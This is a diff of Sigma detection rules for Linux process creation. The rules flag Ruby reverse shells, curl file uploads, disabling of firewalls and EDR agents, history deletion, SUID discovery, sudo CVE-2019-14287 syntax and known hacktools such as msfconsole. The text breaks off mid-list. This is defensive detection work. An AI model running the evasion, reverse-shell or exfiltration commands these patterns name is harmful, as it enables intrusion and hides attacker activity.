https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md +author: Alejandro Ortuno, oscd.community date: 2020/10/22 modified: 2021/11/27 +tags: + - attack.discovery + - attack.t1018 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection_1: - Image|endswith: '/arp' - CommandLine|contains: '-a' - selection_2: - Image|endswith: '/ping' - CommandLine|contains: - - ' 10.' #10.0.0.0/8 - - ' 192.168.' #192.168.0.0/16 - - ' 172.16.' #172.16.0.0/12 - - ' 172.17.' - - ' 172.18.' - - ' 172.19.' - - ' 172.20.' - - ' 172.21.' - - ' 172.22.' - - ' 172.23.' - - ' 172.24.' - - ' 172.25.' - - ' 172.26.' - - ' 172.27.' - - ' 172.28.' - - ' 172.29.' - - ' 172.30.' - - ' 172.31.' - - ' 127.' #127.0.0.0/8 - - ' 169.254.' #169.254.0.0/16 - condition: 1 of selection* + selection_1: + Image|endswith: '/arp' + CommandLine|contains: '-a' + selection_2: + Image|endswith: '/ping' + CommandLine|contains: + - ' 10.' # 10.0.0.0/8 + - ' 192.168.' # 192.168.0.0/16 + - ' 172.16.' # 172.16.0.0/12 + - ' 172.17.' + - ' 172.18.' + - ' 172.19.' + - ' 172.20.' + - ' 172.21.' + - ' 172.22.' + - ' 172.23.' + - ' 172.24.' + - ' 172.25.' + - ' 172.26.' + - ' 172.27.' + - ' 172.28.' + - ' 172.29.' + - ' 172.30.' + - ' 172.31.' + - ' 127.' # 127.0.0.0/8 + - ' 169.254.' # 169.254.0.0/16 + condition: 1 of selection* falsepositives: - - Legitimate administration activities + - Legitimate administration activities level: low -tags: - - attack.discovery - - attack.t1018 diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_remove_package.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_remove_package.yml new file mode 100644 index 000000000..06346824c --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_remove_package.yml @@ -0,0 +1,42 @@ +title: Linux Package Uninstall +id: 95d61234-7f56-465c-6f2d-b562c6fedbc4 +status: test +description: Detects linux package removal using builtin tools such as "yum", "apt", "apt-get" or "dpkg". +references: + - https://sysdig.com/blog/mitre-defense-evasion-falco + - https://www.tutorialspoint.com/how-to-install-a-software-on-linux-using-yum-command + - https://linuxhint.com/uninstall_yum_package/ + - https://linuxhint.com/uninstall-debian-packages/ +author: Tuan Le (NCSGroup), Nasreddine Bencherchali (Nextron Systems) +date: 2023/03/09 +tags: + - attack.defense_evasion + - attack.t1070 +logsource: + product: linux + category: process_creation +detection: + selection_yum: + Image|endswith: '/yum' + CommandLine|contains: + - 'erase' + - 'remove' + selection_apt: + Image|endswith: + - '/apt' + - '/apt-get' + CommandLine|contains: + - 'remove' + - 'purge' + selection_dpkg: + Image|endswith: '/dpkg' + CommandLine|contains: + - '--remove ' + - ' -r ' + selection_rpm: + Image|endswith: '/rpm' + CommandLine|contains: ' -e ' + condition: 1 of selection_* +falsepositives: + - Administrator or administrator scripts might delete packages for several reasons (debugging, troubleshooting). +level: low diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_ruby_reverse_shell.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_ruby_reverse_shell.yml new file mode 100644 index 000000000..6bacb829c --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_ruby_reverse_shell.yml @@ -0,0 +1,34 @@ +title: Potential Ruby Reverse Shell +id: b8bdac18-c06e-4016-ac30-221553e74f59 +status: test +description: Detects execution of ruby with the "-e" flag and calls to "socket" related functions. This could be an indication of a potential attempt to setup a reverse shell +references: + - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet + - https://www.revshells.com/ +author: '@d4ns4n_' +date: 2023/04/07 +tags: + - attack.execution +logsource: + category: process_creation + product: linux +detection: + selection: + Image|contains: 'ruby' + CommandLine|contains|all: + - ' -e' + - 'rsocket' + - 'TCPSocket' + CommandLine|contains: + - ' ash' + - ' bash' + - ' bsh' + - ' csh' + - ' ksh' + - ' pdksh' + - ' sh' + - ' tcsh' + condition: selection +falsepositives: + - Unknown +level: medium diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_schedule_task_job_cron.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_schedule_task_job_cron.yml index 0a78a6256..b9f627587 100644 --- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_schedule_task_job_cron.yml +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_schedule_task_job_cron.yml @@ -1,25 +1,25 @@ -title: Scheduled Cron Task/Job +title: Scheduled Cron Task/Job - Linux id: 6b14bac8-3e3a-4324-8109-42f0546a347f status: test description: Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder. -author: Alejandro Ortuno, oscd.community references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md +author: Alejandro Ortuno, oscd.community date: 2020/10/06 -modified: 2021/11/27 +modified: 2022/11/27 +tags: + - attack.execution + - attack.persistence + - attack.privilege_escalation + - attack.t1053.003 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection: - Image|endswith: 'crontab' - CommandLine|contains: '/tmp/' - condition: selection + selection: + Image|endswith: 'crontab' + CommandLine|contains: '/tmp/' + condition: selection falsepositives: - - Legitimate administration activities + - Legitimate administration activities level: medium -tags: - - attack.execution - - attack.persistence - - attack.privilege_escalation - - attack.t1053.003 diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml index dd93f19bd..5101c2e75 100644 --- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml @@ -1,32 +1,34 @@ -title: Security Software Discovery +title: Security Software Discovery - Linux id: c9d8b7fd-78e4-44fe-88f6-599135d46d60 status: test -description: Detects usage of system utilities (only grep for now) to discover security software discovery -author: Daniil Yugoslavskiy, oscd.community +description: Detects usage of system utilities (only grep and egrep for now) to discover security software discovery references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md +author: Daniil Yugoslavskiy, oscd.community date: 2020/10/19 -modified: 2021/11/27 +modified: 2022/11/27 +tags: + - attack.discovery + - attack.t1518.001 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - grep_execution: - Image|endswith: '/grep' - security_services_and_processes: - CommandLine|contains: - - 'nessusd' # nessus vulnerability scanner - - 'td-agent' # fluentd log shipper - - 'packetbeat' # elastic network logger/shipper - - 'filebeat' # elastic log file shipper - - 'auditbeat' # elastic auditing agent/log shipper - - 'osqueryd' # facebook osquery - - 'cbagentd' # carbon black - - 'falcond' # crowdstrike falcon - condition: grep_execution and security_services_and_processes + selection: + Image|endswith: + # You can add more grep variations such as fgrep, rgrep...etc + - '/grep' + - '/egrep' + CommandLine|contains: + - 'nessusd' # nessus vulnerability scanner + - 'td-agent' # fluentd log shipper + - 'packetbeat' # elastic network logger/shipper + - 'filebeat' # elastic log file shipper + - 'auditbeat' # elastic auditing agent/log shipper + - 'osqueryd' # facebook osquery + - 'cbagentd' # carbon black + - 'falcond' # crowdstrike falcon + condition: selection falsepositives: - - Legitimate activities + - Legitimate activities level: low -tags: - - attack.discovery - - attack.t1518.001 diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml index b82d1f331..fa83e7f38 100644 --- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml @@ -1,12 +1,12 @@ title: Disabling Security Tools id: e3a8a052-111f-4606-9aee-f28ebeb76776 -status: experimental +status: test description: Detects disabling security tools +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md author: Ömer Günal, Alejandro Ortuno, oscd.community date: 2020/06/17 -modified: 2021/09/14 -references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md +modified: 2022/10/09 tags: - attack.defense_evasion - attack.t1562.004 @@ -17,66 +17,66 @@ detection: selection_iptables_1: Image|endswith: '/service' CommandLine|contains|all: - - 'iptables' - - 'stop' + - 'iptables' + - 'stop' selection_iptables_2: Image|endswith: '/service' CommandLine|contains|all: - - 'ip6tables' - - 'stop' + - 'ip6tables' + - 'stop' selection_iptables_3: Image|endswith: '/chkconfig' CommandLine|contains|all: - - 'iptables' - - 'stop' + - 'iptables' + - 'stop' selection_iptables_4: Image|endswith: '/chkconfig' CommandLine|contains|all: - - 'ip6tables' - - 'stop' + - 'ip6tables' + - 'stop' selection_firewall_1: Image|endswith: '/systemctl' CommandLine|contains|all: - - 'firewalld' - - 'stop' + - 'firewalld' + - 'stop' selection_firewall_2: Image|endswith: '/systemctl' CommandLine|contains|all: - - 'firewalld' - - 'disable' + - 'firewalld' + - 'disable' selection_carbonblack_1: Image|endswith: '/service' CommandLine|contains|all: - - 'cbdaemon' - - 'stop' + - 'cbdaemon' + - 'stop' selection_carbonblack_2: Image|endswith: '/chkconfig' CommandLine|contains|all: - - 'cbdaemon' - - 'off' + - 'cbdaemon' + - 'off' selection_carbonblack_3: Image|endswith: '/systemctl' CommandLine|contains|all: - - 'cbdaemon' - - 'stop' + - 'cbdaemon' + - 'stop' selection_carbonblack_4: Image|endswith: '/systemctl' CommandLine|contains|all: - - 'cbdaemon' - - 'disable' + - 'cbdaemon' + - 'disable' selection_selinux: Image|endswith: '/setenforce' CommandLine|contains: '0' selection_crowdstrike_1: Image|endswith: '/systemctl' CommandLine|contains|all: - - 'stop' - - 'falcon-sensor' + - 'stop' + - 'falcon-sensor' selection_crowdstrike_2: Image|endswith: '/systemctl' CommandLine|contains|all: - - 'disable' - - 'falcon-sensor' + - 'disable' + - 'falcon-sensor' condition: 1 of selection* falsepositives: - Legitimate administration activities diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml new file mode 100644 index 000000000..4cd164140 --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml @@ -0,0 +1,26 @@ +title: Disable Or Stop Services +id: de25eeb8-3655-4643-ac3a-b662d3f26b6b +status: test +description: Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services +references: + - https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html +author: Nasreddine Bencherchali (Nextron Systems) +date: 2022/09/15 +tags: + - attack.defense_evasion +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: + - '/service' + - '/systemctl' + - '/chkconfig' + CommandLine|contains: + - 'stop' + - 'disable' + condition: selection +falsepositives: + - Legitimate administration activities +level: medium diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_setgid_setuid.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_setgid_setuid.yml new file mode 100644 index 000000000..f807d3c60 --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_setgid_setuid.yml @@ -0,0 +1,27 @@ +title: Setuid and Setgid +id: c21c4eaa-ba2e-419a-92b2-8371703cbe21 +status: test +description: Detects suspicious change of file privileges with chown and chmod commands +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.001/T1548.001.md + - https://attack.mitre.org/techniques/T1548/001/ +author: Ömer Günal +date: 2020/06/16 +modified: 2022/10/05 +tags: + - attack.persistence + - attack.t1548.001 +logsource: + product: linux + category: process_creation +detection: + selection_root: + CommandLine|contains: 'chown root' + selection_perm: + CommandLine|contains: + - ' chmod u+s' + - ' chmod g+s' + condition: all of selection_* +falsepositives: + - Legitimate administration activities +level: low diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_ssm_agent_abuse.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_ssm_agent_abuse.yml new file mode 100644 index 000000000..86183047b --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_ssm_agent_abuse.yml @@ -0,0 +1,29 @@ +title: Potential Linux Amazon SSM Agent Hijacking +id: f9b3edc5-3322-4fc7-8aa3-245d646cc4b7 +status: experimental +description: Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report. +references: + - https://www.mitiga.io/blog/mitiga-security-advisory-abusing-the-ssm-agent-as-a-remote-access-trojan + - https://www.bleepingcomputer.com/news/security/amazons-aws-ssm-agent-can-be-used-as-post-exploitation-rat-malware/ + - https://www.helpnetsecurity.com/2023/08/02/aws-instances-attackers-access/ +author: Muhammad Faisal +date: 2023/08/03 +tags: + - attack.command_and_control + - attack.persistence + - attack.t1219 +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: '/amazon-ssm-agent' + CommandLine|contains|all: + - '-register ' + - '-code ' + - '-id ' + - '-region ' + condition: selection +falsepositives: + - Legitimate activity of system administrators +level: medium diff --git a/src/main/resources/rules/linux/builtin/lnx_sudo_cve_2019_14287.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_sudo_cve_2019_14287.yml similarity index 76% rename from src/main/resources/rules/linux/builtin/lnx_sudo_cve_2019_14287.yml rename to src/main/resources/rules/linux/process_creation/proc_creation_lnx_sudo_cve_2019_14287.yml index bc4c3da22..3226bafe7 100644 --- a/src/main/resources/rules/linux/builtin/lnx_sudo_cve_2019_14287.yml +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_sudo_cve_2019_14287.yml @@ -1,25 +1,26 @@ title: Sudo Privilege Escalation CVE-2019-14287 id: f74107df-b6c6-4e80-bf00-4170b658162b -status: experimental +status: test description: Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287 -author: Florian Roth -date: 2019/10/15 -modified: 2021/09/14 references: - https://www.openwall.com/lists/oss-security/2019/10/14/1 - https://access.redhat.com/security/cve/cve-2019-14287 - https://twitter.com/matthieugarin/status/1183970598210412546 -logsource: - product: linux +author: Florian Roth (Nextron Systems) +date: 2019/10/15 +modified: 2022/10/05 tags: - attack.privilege_escalation - attack.t1068 - attack.t1548.003 - cve.2019.14287 +logsource: + product: linux + category: process_creation detection: - selection_keywords: - - '* -u#*' - condition: selection_keywords + selection: + CommandLine|contains: ' -u#' + condition: selection falsepositives: - Unlikely level: high diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_chmod_directories.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_chmod_directories.yml index 080bc6be2..e570ccd0d 100644 --- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_chmod_directories.yml +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_chmod_directories.yml @@ -1,27 +1,27 @@ title: Chmod Suspicious Directory id: 6419afd1-3742-47a5-a7e6-b50386cd15f8 -status: experimental +status: test description: Detects chmod targeting files in abnormal directory paths. -author: 'Christopher Peacock @SecurePeacock, SCYTHE @scythe_io' references: - - https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/ - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md + - https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/ + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md +author: 'Christopher Peacock @SecurePeacock, SCYTHE @scythe_io' date: 2022/06/03 +tags: + - attack.defense_evasion + - attack.t1222.002 logsource: - product: linux - category: process_creation + product: linux + category: process_creation detection: - selection: - Image|endswith: '/chmod' - CommandLine|contains: - - '/tmp/' - - '/.Library/' - - '/etc/' - - '/opt/' - condition: selection + selection: + Image|endswith: '/chmod' + CommandLine|contains: + - '/tmp/' + - '/.Library/' + - '/etc/' + - '/opt/' + condition: selection falsepositives: - - Admin changing file permissions. + - Admin changing file permissions. level: medium -tags: - - attack.defense_evasion - - attack.t1222.002 diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_container_residence_discovery.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_container_residence_discovery.yml new file mode 100644 index 000000000..0a5d36c4f --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_container_residence_discovery.yml @@ -0,0 +1,38 @@ +title: Container Residence Discovery Via Proc Virtual FS +id: 746c86fb-ccda-4816-8997-01386263acc4 +status: experimental +description: Detects potential container discovery via listing of certain kernel features in the "/proc" virtual filesystem +references: + - https://blog.skyplabs.net/posts/container-detection/ + - https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker +tags: + - attack.discovery + - attack.t1082 +author: Seth Hanford +date: 2023/08/23 +logsource: + category: process_creation + product: linux +detection: + selection_tools: + Image|endswith: + - 'awk' + - '/cat' + - 'grep' + - '/head' + - '/less' + - '/more' + - '/nl' + - '/tail' + selection_procfs_kthreadd: # outside containers, PID 2 == kthreadd + CommandLine|contains: '/proc/2/' + selection_procfs_target: + CommandLine|contains: '/proc/' + CommandLine|endswith: + - '/cgroup' # cgroups end in ':/' outside containers + - '/sched' # PID mismatch when run in containers + condition: selection_tools and 1 of selection_procfs_* +falsepositives: + - Legitimate system administrator usage of these commands + - Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered +level: low diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml new file mode 100644 index 000000000..136298154 --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml @@ -0,0 +1,41 @@ +title: Suspicious Curl File Upload - Linux +id: 00b90cc1-17ec-402c-96ad-3a8117d7a582 +related: + - id: 00bca14a-df4e-4649-9054-3f2aa676bc04 + type: derived +status: test +description: Detects a suspicious curl process start the adds a file to a web request +references: + - https://twitter.com/d1r4c/status/1279042657508081664 + - https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76 + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file + - https://curl.se/docs/manpage.html + - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html +author: Nasreddine Bencherchali (Nextron Systems), Cedric MAURUGEON (Update) +date: 2022/09/15 +modified: 2023/05/02 +tags: + - attack.exfiltration + - attack.t1567 + - attack.t1105 +logsource: + category: process_creation + product: linux +detection: + selection_img: + Image|endswith: '/curl' + selection_cli: + - CommandLine|contains: + - ' --form' # Also covers the "--form-string" + - ' --upload-file ' + - ' --data ' + - ' --data-' # For flags like: "--data-ascii", "--data-binary", "--data-raw", "--data-urlencode" + - CommandLine|re: '\s-[FTd]\s' # We use regex to ensure a case sensitive argument detection + filter_optional_localhost: + CommandLine|contains: + - '://localhost' + - '://127.0.0.1' + condition: all of selection_* and not 1 of filter_optional_* +falsepositives: + - Scripts created by developers and admins +level: medium diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml new file mode 100644 index 000000000..33e5eb987 --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml @@ -0,0 +1,28 @@ +title: Suspicious Curl Change User Agents - Linux +id: b86d356d-6093-443d-971c-9b07db583c68 +related: + - id: 3286d37a-00fd-41c2-a624-a672dcd34e60 + type: derived +status: test +description: Detects a suspicious curl process start on linux with set useragent options +references: + - https://curl.se/docs/manpage.html +author: Nasreddine Bencherchali (Nextron Systems) +date: 2022/09/15 +tags: + - attack.command_and_control + - attack.t1071.001 +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: '/curl' + CommandLine|contains: + - ' -A ' + - ' --user-agent ' + condition: selection +falsepositives: + - Scripts created by developers and admins + - Administrative activity +level: medium diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_dockerenv_recon.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_dockerenv_recon.yml new file mode 100644 index 000000000..22b41e675 --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_dockerenv_recon.yml @@ -0,0 +1,32 @@ +title: Docker Container Discovery Via Dockerenv Listing +id: 11701de9-d5a5-44aa-8238-84252f131895 +status: experimental +description: Detects listing or file reading of ".dockerenv" which can be a sing of potential container discovery +references: + - https://blog.skyplabs.net/posts/container-detection/ + - https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker +tags: + - attack.discovery + - attack.t1082 +author: Seth Hanford +date: 2023/08/23 +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: + # Note: add additional tools and utilities to increase coverage + - '/cat' + - '/dir' + - '/find' + - '/ls' + - '/stat' + - '/test' + - 'grep' + CommandLine|endswith: '.dockerenv' + condition: selection +falsepositives: + - Legitimate system administrator usage of these commands + - Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered +level: low diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_execution_tmp_folder.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_execution_tmp_folder.yml new file mode 100644 index 000000000..c0ac903fa --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_execution_tmp_folder.yml @@ -0,0 +1,24 @@ +title: Potentially Suspicious Execution From Tmp Folder +id: 312b42b1-bded-4441-8b58-163a3af58775 +status: experimental +description: Detects a potentially suspicious execution of a process located in the '/tmp/' folder +references: + - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html + - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/ + - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection + - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection +author: Joseliyo Sanchez, @Joseliyo_Jstnk +date: 2023/06/02 +tags: + - attack.defense_evasion + - attack.t1036 +logsource: + product: linux + category: process_creation +detection: + selection: + Image|startswith: '/tmp/' + condition: selection +falsepositives: + - Unknown +level: high diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_find_execution.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_find_execution.yml new file mode 100644 index 000000000..7c15f0efb --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_find_execution.yml @@ -0,0 +1,33 @@ +title: Potential Discovery Activity Using Find - Linux +id: 8344c0e5-5783-47cc-9cf9-a0f7fd03e6cf +related: + - id: 85de3a19-b675-4a51-bfc6-b11a5186c971 + type: similar +status: test +description: Detects usage of "find" binary in a suspicious manner to perform discovery +references: + - https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes +author: Nasreddine Bencherchali (Nextron Systems) +date: 2022/12/28 +tags: + - attack.discovery + - attack.t1083 +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: '/find' + CommandLine|contains: + - '-perm -4000' + - '-perm -2000' + - '-perm 0777' + - '-perm -222' + - '-perm -o w' + - '-perm -o x' + - '-perm -u=s' + - '-perm -g=s' + condition: selection +falsepositives: + - Unknown +level: medium diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_git_clone.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_git_clone.yml new file mode 100644 index 000000000..8abc41bc3 --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_git_clone.yml @@ -0,0 +1,41 @@ +title: Suspicious Git Clone - Linux +id: cfec9d29-64ec-4a0f-9ffe-0fdb856d5446 +status: test +description: Detects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious +references: + - https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/01/03 +modified: 2023/01/05 +tags: + - attack.reconnaissance + - attack.t1593.003 +logsource: + category: process_creation + product: linux +detection: + selection_img: + Image|endswith: '/git' + CommandLine|contains: ' clone ' + selection_keyword: + CommandLine|contains: + # Add more suspicious keywords + - 'exploit' + - 'Vulns' + - 'vulnerability' + - 'RCE' + - 'RemoteCodeExecution' + - 'Invoke-' + - 'CVE-' + - 'poc-' + - 'ProofOfConcept' + # Add more vuln names + - 'proxyshell' + - 'log4shell' + - 'eternalblue' + - 'eternal-blue' + - 'MS17-' + condition: all of selection_* +falsepositives: + - Unknown +level: medium diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml index a9dc1f6ff..f520d0b93 100644 --- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml @@ -1,26 +1,34 @@ title: History File Deletion id: 1182f3b3-e716-4efa-99ab-d2685d04360f -status: experimental +status: test description: Detects events in which a history file gets deleted, e.g. the ~/bash_history to remove traces of malicious activity -author: Florian Roth references: - - https://github.com/sleventyeleven/linuxprivchecker/ + - https://github.com/sleventyeleven/linuxprivchecker/ + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md +author: Florian Roth (Nextron Systems) date: 2022/06/20 +modified: 2022/09/15 +tags: + - attack.impact + - attack.t1565.001 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection: - Image|endswith: '/rm' - selection_history: - - CommandLine|contains: - - '/.bash_history' - - '/.zsh_history' - - CommandLine|endswith: '_history' - condition: all of selection* + selection: + Image|endswith: + - '/rm' + - '/unlink' + - '/shred' + selection_history: + - CommandLine|contains: + - '/.bash_history' + - '/.zsh_history' + - CommandLine|endswith: + - '_history' + - '.history' + - 'zhistory' + condition: all of selection* falsepositives: - - Legitimate administration activities + - Legitimate administration activities level: high -tags: - - attack.impact - - attack.t1565.001 diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml index a91de0a28..74f8b6229 100644 --- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml @@ -1,26 +1,35 @@ title: Print History File Contents id: d7821ff1-4527-4e33-9f84-d0d57fa2fb66 -status: experimental +status: test description: Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance -author: Florian Roth references: - - https://github.com/sleventyeleven/linuxprivchecker/ + - https://github.com/sleventyeleven/linuxprivchecker/ + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md +author: Florian Roth (Nextron Systems) date: 2022/06/20 +modified: 2022/09/15 +tags: + - attack.reconnaissance + - attack.t1592.004 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection: - Image|endswith: '/cat' - selection_history: - - CommandLine|contains: - - '/.bash_history' - - '/.zsh_history' - - CommandLine|endswith: '_history' - condition: all of selection* + selection: + Image|endswith: + - '/cat' + - '/head' + - '/tail' + - '/more' + selection_history: + - CommandLine|contains: + - '/.bash_history' + - '/.zsh_history' + - CommandLine|endswith: + - '_history' + - '.history' + - 'zhistory' + condition: all of selection* falsepositives: - - Legitimate administration activities + - Legitimate administration activities level: medium -tags: - - attack.reconnaissance - - attack.t1592.004 diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_hktl_execution.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_hktl_execution.yml new file mode 100644 index 000000000..32f9da31b --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_hktl_execution.yml @@ -0,0 +1,99 @@ +title: Linux HackTool Execution +id: a015e032-146d-4717-8944-7a1884122111 +status: experimental +description: Detects known hacktool execution based on image name. +references: + - https://github.com/Gui774ume/ebpfkit + - https://github.com/pathtofile/bad-bpf + - https://github.com/carlospolop/PEASS-ng + - https://github.com/t3l3machus/hoaxshell + - https://github.com/t3l3machus/Villain + - https://github.com/HavocFramework/Havoc + - https://github.com/1N3/Sn1per + - https://github.com/Ne0nd0g/merlin + - https://github.com/Pennyw0rth/NetExec/ +author: Nasreddine Bencherchali (Nextron Systems), Georg Lauenstein (sure[secure]) +date: 2023/01/03 +modified: 2023/10/25 +tags: + - attack.execution + - attack.resource_development + - attack.t1587 +logsource: + product: linux + category: process_creation +detection: + selection_c2_frameworks: + Image|endswith: + - '/crackmapexec' + - '/havoc' + - '/merlin-agent' + - '/merlinServer-Linux-x64' + - '/msfconsole' + - 